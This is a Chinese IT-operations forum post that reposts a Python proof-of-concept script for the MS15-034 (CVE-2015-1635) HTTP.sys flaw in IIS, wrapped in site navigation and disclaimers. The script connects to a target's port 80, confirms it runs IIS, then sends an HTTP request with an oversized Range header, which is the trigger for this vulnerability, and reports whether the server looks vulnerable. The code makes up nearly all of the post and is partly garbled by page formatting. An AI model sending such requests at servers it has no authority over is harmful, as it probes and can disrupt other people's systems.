设为首页 收藏本站
查看: 1385|回复: 0

[经验分享] MS15-034 IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC

[复制链接]

尚未签到

发表于 2018-12-8 09:37:13 | 显示全部楼层 |阅读模式
#!/usr/bin/env python  
# coding=utf-8
  

  
"""
  
Site: http://www.beebeeto.com/
  
Framework: https://github.com/n0tr00t/Beebeeto-framework
  
"""
  

  
import socket
  
import random
  
import urlparse
  

  
from baseframe import BaseFrame
  

  

  
class MyPoc(BaseFrame):
  
    poc_info = {
  
        # poc相关信息
  
        'poc': {
  
            'id': 'poc-2015-0081',
  
            'name': 'IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC',
  
            'author': 'user1018',
  
            'create_date': '2015-04-15',
  
        },
  
        # 协议相关信息
  
        'protocol': {
  
            'name': 'http',
  
            'port': [80],
  
            'layer4_protocol': ['tcp'],
  
        },
  
        # 漏洞相关信息
  
        'vul': {
  
            'app_name': 'IIS',
  
            'vul_version': ['7.0'],
  
            'type': 'Code Execution',
  
            'tag': ['IIS7.0漏洞', 'HTTP.sys漏洞', 'CVE-2015-1635'],
  
            'desc': '''
  
                    影响范围:
  
                        Windows7
  
                        Windows8
  
                        Windows server 2008
  
                        Windows server 2012
  
                    远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求
  
                     时会导致此漏洞。 成功利用此漏洞的***者可以在系统帐户的上下文中执行任意代码。
  

  
                    若要利用此漏洞,***者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理
  
                     请求的方式,安装更新可以修复此漏洞。
  
                    ''',
  
            'references': ['https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx',
  
                            'http://bobao.360.cn/news/detail/1435.html'],
  
        },
  
    }
  

  

  
    @classmethod
  
    def verify(cls, args):
  
        target = args['options']['target']
  
        if urlparse.urlparse(target).netloc == '':
  
            ipAddr = urlparse.urlparse(target).path
  
        else:
  
            ipAddr = socket.gethostbyname(urlparse.urlparse(target).netloc)
  
        hexAllFfff = "18446744073709551615"
  
        req1 = "GET / HTTP/1.0\r\n\r\n"
  
        req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
  
         if args['options']['verbose']:
  
            print '
  • Target: ' + ipAddr
      
                print '
  • Audit Started'
      
            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      
            client_socket.connect((ipAddr, 80))
      
            client_socket.send(req1)
      
            boringResp = client_socket.recv(1024)
      
            # test ms-iis
      
            if "Microsoft" not in boringResp:
      
                print "
  • Not IIS"
      
                return args
      
            client_socket.close()
      
            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      
            client_socket.connect((ipAddr, 80))
      
            client_socket.send(req)
      
            goodResp = client_socket.recv(1024)
      

      
            if "Requested Range Not Satisfiable" in goodResp:
      
                print "[+] Looks Vulnerability!"
      
                args['success'] = True
      
                args['poc_ret']['vulnerability'] = ipAddr
      
            elif " The request has an invalid header name" in goodResp:
      
                args['poc_ret']['error'] = "
  • Looks Patched"
      
            else:
      
                args['poc_ret']['error'] = "
  • Unexpected response, cannot discern patch status"
      
             return args
      

      
        exploit = verify
      

      
    if __name__ == '__main__':
      
        from pprint import pprint
      

      
        mp = MyPoc()
      
        pprint(mp.run())



  • 运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
    2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
    3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
    4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
    5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
    6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
    7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
    8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

    所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-644558-1-1.html 上篇帖子: IIS删除http header信息如Server, X-Powered-By, 和X-AspNet-Version 下篇帖子: win7 重装系统后,IIS安装报错多
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    扫码加入运维网微信交流群X

    扫码加入运维网微信交流群

    扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

    扫描微信二维码查看详情

    客服E-mail:kefu@iyunv.com 客服QQ:1061981298


    QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


    提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


    本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



    合作伙伴: 青云cloud

    快速回复 返回顶部 返回列表